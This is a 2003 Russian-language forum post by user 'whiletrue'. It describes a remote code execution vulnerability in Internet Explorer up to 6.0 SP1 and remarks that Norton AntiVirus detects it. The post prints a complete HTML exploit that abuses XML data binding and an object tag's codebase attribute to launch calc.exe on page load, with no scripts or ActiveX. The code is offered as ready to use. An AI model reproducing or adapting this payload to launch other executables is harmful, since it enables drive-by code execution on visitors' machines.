Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Уязвимость ИЕ вплоть до 6.0 SP1 25.07.03 16:43 Число просмотров: 2124
Автор: whiletrue <Роман> Статус: Elderman Отредактировано 26.07.03 11:03 Количество правок: 4
|
Существует весьма серьезная уязвимость в браузере Internet Explorer вплоть до 6.0 SP1. С её помощью на удаленной машине можно запустить любую программу, причем без использования скриптов и ActiveX.
Задействовать её можно с помощью следующего HTML-кода. Данный код, автоматически запустит калькулятор, если он лежит в c:/winnt/system32/calc.exe.
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
---
NAV - уязвимость знает.
По материалу Компьюленты 05.03.02
|
- Уязвимость ИЕ вплоть до 6.0 SP1 - whiletrue 25.07.03 16:43 [2124]
|
|
|